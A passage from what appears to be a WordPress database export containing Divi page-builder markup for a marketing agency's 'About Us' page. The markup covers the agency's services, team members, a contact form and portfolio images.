animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\" alt=\"Creative graphic designing \" title_text=\"Creative graphic designing \"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"View All\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#f7f7f7\" button_border_width=\"4px\" button_border_color=\"#f7f7f7\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#fcd21d\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field fullwidth_field=\"on\" _builder_version=\"4.5.2\" _module_preset=\"default\" field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" hover_enabled=\"0\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','about-us','','inherit','closed','closed','','392-revision-v1','','','2020-08-07 19:18:17','2020-08-07 19:18:17','',392,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/392-revision-v1/',0,'revision','',0),(550,1,'2020-08-07 19:24:16','2020-08-07 19:24:16','[et_pb_section fb_built=\"1\" admin_label=\"Page Header\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>About US</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"About Us Section\" _builder_version=\"4.5.2\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/WhyWE.jpg\" custom_margin=\"|5%||5%\" custom_margin_tablet=\"\" custom_margin_phone=\"|0px||0px\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%|||\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"5%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-200px\" box_shadow_color=\"#ffffff\" alt=\"about WhatTheHell?\" title_text=\"whatthehell about us\" parallax=\"on\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"About Us Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"27px|0px|0px|0px\"][et_pb_column type=\"2_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_color=\"#f7f7f7\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"10%|10%|10%|10%\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" box_shadow_style=\"preset1\" box_shadow_vertical=\"15px\" box_shadow_blur=\"45px\" box_shadow_color=\"rgba(0,0,0,0.15)\" locked=\"off\"]<h2>Build Brand Equity</h2>\n<p>Our advertising and marketing startegies are aligned towards the core objectives of the business operation of sustainable sales leading to profit and building brand equity as long term asset creation for the businesses.</p>\n<p><span style=\"font-size: 16px;\">There is a need to understand the various phases of businesses &amp; invest in marketing (Sales or Brand Building) in the required proportion. As per the budget of the business we can align our marketing and advertising strategies into aggressive disruptive to guerilla or safe. As the successful advertising and marketing require patience and balancing various market forces to help your business thrust to an upward direction.</span></p>\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"110px|0px|110px|0px\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"4%\" animation_starting_opacity=\"100%\" locked=\"off\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_font=\"||||||||\" text_text_color=\"#353740\" text_font_size=\"24px\" text_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\" hover_enabled=\"0\"]<p><span>With the advent to this digital era, <strong>Unique traffic to your website</strong>, is becoming the key battle point. Targeting the appropriate TG and reaching to them at the right place and the moment can help you earn them for lifetime.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#d4b068\" background_color_gradient_end=\"#ffffff\" background_color_gradient_start_position=\"30%\" background_color_gradient_end_position=\"30%\" custom_padding=\"0px||110px|\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"0px|0px|0px|0px\" animation_direction=\"top\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=GQB6K7Dozms\" image_src=\"//i.ytimg.com/vi/GQB6K7Dozms/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Team Member Section\" _builder_version=\"3.22\" custom_padding=\"110px||60px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#353740\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Fearless Leaeders</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p>We do not fear trying new stuff and failure (we say learning). Meet the <span>team of professionals enjoying their work and adding value to your project.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||15px|\" hover_enabled=\"0\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Dhiraj Kumar\" position=\"Founder\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard.jpg\" linkedin_url=\"https://www.linkedin.com/in/dhirajwth\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" hover_enabled=\"0\" alt=\"dhiraj kumar founder \" title_text=\"dhiraj kumar whatthehell?\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Christina Foster\" position=\"Creative Director\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-06.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"100ms\" hover_enabled=\"0\" locked=\"off\" alt=\"dhiraj kumar founder \" title_text=\"travel-portrait-06\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Jason Wardak\" position=\"Visual Media\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-04.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"200ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Other Recent Works Section\" _builder_version=\"3.22\" background_color=\"#353740\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#d4b068\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_color=\"#d4b068\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#d4b068\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>our Work</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#f7f7f7\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" admin_label=\"Other Recent Works Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Packaging Design\" title_text=\"packaging design by what the hell\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Packaging Design creative agency\" title_text=\"packaging design creative advertising agency\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" 